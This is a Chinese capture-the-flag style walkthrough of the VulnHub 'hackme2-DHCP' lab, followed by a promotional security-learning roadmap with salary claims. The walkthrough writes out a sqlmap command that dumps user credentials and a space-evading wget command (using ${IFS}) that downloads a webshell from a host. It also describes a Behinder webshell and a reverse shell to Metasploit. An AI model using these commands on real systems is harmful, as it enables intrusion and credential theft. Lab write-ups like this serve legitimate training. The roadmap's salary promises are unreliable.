hackDHCP靶场教程

hackDHCP靶场教程

靶场地址：https://download.vulnhub.com/hackme/hackme2-DHCP.ova

第一眼就看见了注册，那么这个靶场的思路可能就是注册后的操作，毕竟如果不是，开了这个也没什么用

注册一个用户，然后登陆，登陆成功，翻译了一下是个图书查询的系统

通过页面对比，猜测是个注入

跑了一下

sqlmap -r a.txt -vv --tamper=space2comment --dbms “MySQL” --level 5 -D webapphacking -C “user,pasword” –dump

结果

特殊的用户

Superadmin

解密后

进来了

超级管理员权限

进来的页面有两个点，一个是文件上传，一个是不知道干什么的表单提交，思考如下

制作者考的肯定不是上传点，很明显上传点会难一些，地下更不会放一个无用的表单，挂上XRAY，对功能进行打点，找出容易攻击到的点

Xray扫描入下

可以执行PHP代码

尝试复现

命令执行成功

Wge 下载webshell wget${IFS}http://0.0.0.0//a.php

${IFS}是代替空格的占位符，上线

上传脚本到

发现了一个特殊文件

切换到交互式，还需要往外弹一下

卡壳

最终解决，上传冰蝎马反弹msf 唉，不知道这个靶子为什么nc 用不了

最后

从时代发展的角度看，网络安全的知识是学不完的，而且以后要学的会更多，同学们要摆正心态，既然选择入门网络安全，就不能仅仅只是入门程度而已，能力越强机会才越多。

网络安全基础入门需要学习哪些知识？

网络安全学习路线

这是一份网络安全从零基础到进阶的学习路线大纲全览，小伙伴们记得点个收藏！

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-E70T68fv-1677169695581)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]编辑

阶段一：基础入门

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DvceHtMJ-1677169695582)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

网络安全导论

渗透测试基础

网络基础

操作系统基础

Web安全基础

数据库基础

编程基础

CTF基础

该阶段学完即可年薪15w+

阶段二：技术进阶（到了这一步你才算入门）

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-0BBv244d-1677169695583)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

弱口令与口令爆破

XSS漏洞

CSRF漏洞

SSRF漏洞

XXE漏洞

SQL注入

任意文件操作漏洞

业务逻辑漏洞

该阶段学完年薪25w+

阶段三：高阶提升

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2oygW45q-1677169695583)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

反序列化漏洞

RCE

综合靶场实操项目

内网渗透

流量分析

日志分析

恶意代码分析

应急响应

实战训练

该阶段学完即可年薪30w+

阶段四：蓝队课程

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9MP40Vxq-1677169695584)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

蓝队基础

蓝队进阶

该部分主攻蓝队的防御，即更容易被大家理解的网络安全工程师。

攻防兼备，年薪收入可以达到40w+

阶段五：面试指南&阶段六：升级内容

需要上述路线图对应的网络安全配套视频、源码以及更多网络安全相关书籍&面试题等内容